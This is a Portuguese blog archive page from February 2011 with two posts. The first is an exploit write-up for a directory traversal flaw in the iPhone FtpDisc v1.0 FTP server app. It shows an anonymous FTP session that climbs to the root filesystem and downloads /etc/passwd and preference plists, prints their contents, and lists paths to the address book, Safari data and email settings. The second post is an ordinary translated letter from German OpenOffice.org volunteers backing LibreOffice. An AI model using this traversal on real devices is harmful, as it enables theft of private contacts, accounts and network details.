Mês: fevereiro 2011

FtpDisc v1.0 for iPhone / iPod touch, Directory Traversal

# Exploit Title: FtpDisc v1.0 for iPhone / iPod touch, Directory Traversal
# Date: 02/22/2011
# Author: R3d@l3rt, Sp@2K, Sunlight
# Software Link: http://itunes.apple.com/kr/app/ftpdisc-lite-pdf-reader/id329157971?mt=8
# Version: 1.0
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware

# There is directory traversal vulnerability in the FtpDisc.
# Exploit Testing

C:\>ftp
ftp> open 192.168.0.70 2121
Connected to 192.168.0.70.
220 Mocha FTP Server
User (192.168.0.70:(none)): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls
drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 documents
drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 other
drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 photos
drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 video
226 Transfer completed
ftp: 277 bytes received in 0.00Seconds 277000.00Kbytes/sec.
ftp> cd //..//..//..//..//..//..//
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls
-r-xr-xr-x 1 nobody nobody 0 Aug 3 201012:41 .file
dr-xr-xr-x 1 nobody nobody 1428 Feb 8 12:50 Applications
dr-xr-xr-x 1 nobody nobody 68 Aug 19 2010 4:10 Developer
dr-xr-xr-x 1 nobody nobody 884 Jan 12 12:53 Library
dr-xr-xr-x 1 nobody nobody 102 Aug 19 2010 4:18 System
dr-xr-xr-x 1 nobody nobody 306 Feb 8 11:48 User
dr-xr-xr-x 1 nobody nobody 2074 Jan 13 9:52 bin
dr-xr-xr-x 1 nobody nobody 68 Oct 26 2010 1:19 boot
-r-xr-xr-x 1 nobody nobody 638 Jan 25 15:30 control
dr-xr-xr-x 1 nobody nobody 68 Aug 3 201012:41 cores
1 nobody nobody 68 1 dev
dr-xr-xr-x 1 nobody nobody 918 Jan 26 11:34 etc
dr-xr-xr-x 1 nobody nobody 68 Oct 26 2010 1:19 lib
dr-xr-xr-x 1 nobody nobody 68 Oct 26 2010 1:19 mnt
dr-xr-xr-x 1 nobody nobody 136 Oct 23 201015:12 private
dr-xr-xr-x 1 nobody nobody 1666 Jan 13 9:52 sbin
drwxrwxrwx 1 nobody nobody 272 Feb 22 16:02 tmp
dr-xr-xr-x 1 nobody nobody 374 Jan 13 9:52 usr
dr-xr-xr-x 1 nobody nobody 1088 Oct 26 2010 1:19 var
226 Transfer completed
ftp: 1461 bytes received in 0.02Seconds 91.31Kbytes/sec.
ftp> get ../../../../../../etc/passwd
200 PORT command successful.
550 cannot find the file
ftp> get /../../../../../../etc/passwd
200 PORT command successful.
150 Opening ASCII mode data connection for /../../../../../../etc/passwd
226 Transfer completed
ftp: 785 bytes received in 0.00Seconds 785000.00Kbytes/sec.
ftp> get //..//..//..//..//..//..//private/var/mobile/Library/Preferences/com.apple.Maps.plist
200 PORT command successful.
150 Opening ASCII mode data connection for //..//..//..//..//..//..//private/var/mobile/Library/Preferences/com.apple.Maps.plist
226 Transfer completed
ftp: 1239 bytes received in 0.00Seconds 1239000.00Kbytes/sec.
ftp> quit
221 Goodbye

C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file. Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

C:\>type com.apple.Maps.plist
bplist00?

C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX? XnatFlag
C:\>

# IPhone inside information

1. Phone Book
– /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb

2. Safari Favorites List
– /private/var/mobile/Library/Safari

3. Users E-mail Information
– /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist

4. IPv4 Router Information
– /private/var/mobile/Library/Preferences/com.apple.conference.plist

Todo Fim é um novo Começo – LibreOffice

Caros adeptos do OpenOffice.org,
últimos dias e semanas aqui no projeto foram marcadas por debates às vezes calorosos, sobre como nós percebemos a cooperação no projeto e como podemos fazer isso mais dispostos e capazes. Infelizmente, essa discussão nem sempre foi objetivo, problema e objetivo-orientado, como teria sido desejável, mas às vezes muito emocional.

Causa das discussões foi o anúncio da criação de uma fundação, com o objetivo de promover a suíte de escritório gratuita e representar a comunidade independente de patrocinadores individuais. Esta ideia é quase tão antiga como o próprio projeto OpenOffice.org e tem sido discutido no últimos anos.

O projeto OpenOffice.org tem crescido consideravelmente em sua primeira década de existência. Esse crescimento foi fortemente promovido pelo apoio do principal patrocinador, a Sun ea Oracle, empregando colaboradores e também através da disponibilização e manutenção da plataforma técnica.

No entanto, muitos membros do projeto voluntário e empregados de outras empresas que contribuíram de muitas horas de trabalho e investimentos financeiros para tanto o produto OpenOffice.org, bem como o projecto subjacente. Como exemplo de sucesso desta colaboração, vale a pena mencionar o trabalho nas áreas de documentação, garantia da qualidade e da tradução, os esforços de marketing conjuntas ou organização de eventos comunitários e feiras.

No entanto, mostra mais claramente que toda a cooperação e a constatação comum de soluções que muitas vezes enfrenta restrições. Estes são lugares onde as idéias sobre o desenvolvimento da plataforma de trabalho de design, marketing ou não coincidir com as idéias do principal patrocinador ou que não tenham sido apenas requerido ou executado, porque o responsável ou (legalmente) entidade capaz não tomar qualquer decisão. Isto levou e ainda leva a mal-entendidos e discussões desnecessárias. Para romper esses limites, o projecto tem de evoluir e requer um órgão independente – uma Fundação.

A resposta oficial da Oracle para o anúncio da Fundação documento foi clara – a Oracle continuará OpenOffice.org como de costume. O resultado agora é realmente o conflito recentemente postulado de interesse para os membros da comunidade que estão a cargo de representação ou projeto, mas à qual não é o suficiente “para continuar a trabalhar como sempre fizemos”. Embora tenha sido salientado em diversas ocasiões que haverá colaboração a nível técnico, e as mudanças são possíveis – não há nenhuma indicação de Oracle para mudar a mente sobre a questão da organização e gestão do projecto. Para aqueles que querem alcançar essa mudança, mas não vejo qualquer possibilidade realista dentro do projeto atual e, portanto, envolvidos na TDF, infelizmente, isso resulta em um “ou / ou” pergunta

A resposta para nós que assinam esta carta é clara: queremos uma mudança para dar à comunidade, bem como o software que desenvolve a oportunidade de evoluir. Por esta razão, a partir de agora vamos apoiar a Fundação do documento e – como uma equipe – desenvolver e promover LibreOffice. Esperamos que muitos vão se juntar a nós neste caminho.

Nós também estamos conscientes de que cada indivíduo tem que fazer a sua decisão de sua própria liberdade. Decidimos retirar nossas posições anteriores no projeto germanófonas.

Muito obrigado a todos que fizeram o desenvolvimento anterior do OpenOffice.org possível e com quem partilhamos um caminho longo.

Marko Moeller, Co-Lead, contact website
Jacqueline Rahemipour, Co-Lead, board OOo DeV

Eric Christian, contact PrOOo Box
Rene Hermann, contact for new members
Thomas Krumbein, contact marketing, chairman OOo DeV
Volker Merschmann, contact website
Irmhild Rogalla, contact user support
Friedrich Strohmaier, contact PrOOo Box
Wolfgang Uhlig, contact documentation
Simon Wilper, contact documentation

Thorsten Behrens, development
Rainer Bielefeld, quality assurance
Ulf Brekenfelder, translation
Sigrid Carrera, documentation and user support
Florian Effenberger, marketing, board OOo DeV
Gisbert Friege, website education portal, Dmaths
Gerald Geib, translation und quality assurance
Markus Gommel, treasurer OOo DeV and member support
Thomas Hackert, translation and quality assurance
Volker Heggemann, quality assurance
Edgar Kuchelmeister, user support and documentation
Christian Lohmaier, website and quality assurance
Andreas Mantke, development and documentation
Christoph Noack, user experience and artwork
Jens Nürnberger, PrOOo-Box and quality assurance
Wolfgang Pechlaner, quality assurance and translation
Manfred Reiter, former Co-Lead
Uwe Richter, PrOOo-Box
Bernhard Rückgauer, OOo DeV
André Schnabel, translation, supervisory board OOo DeV
Heinz W. Simoneit, marketing
Klaus-Jürgen Weghorn, website
Stefan Weigel, user support and documentation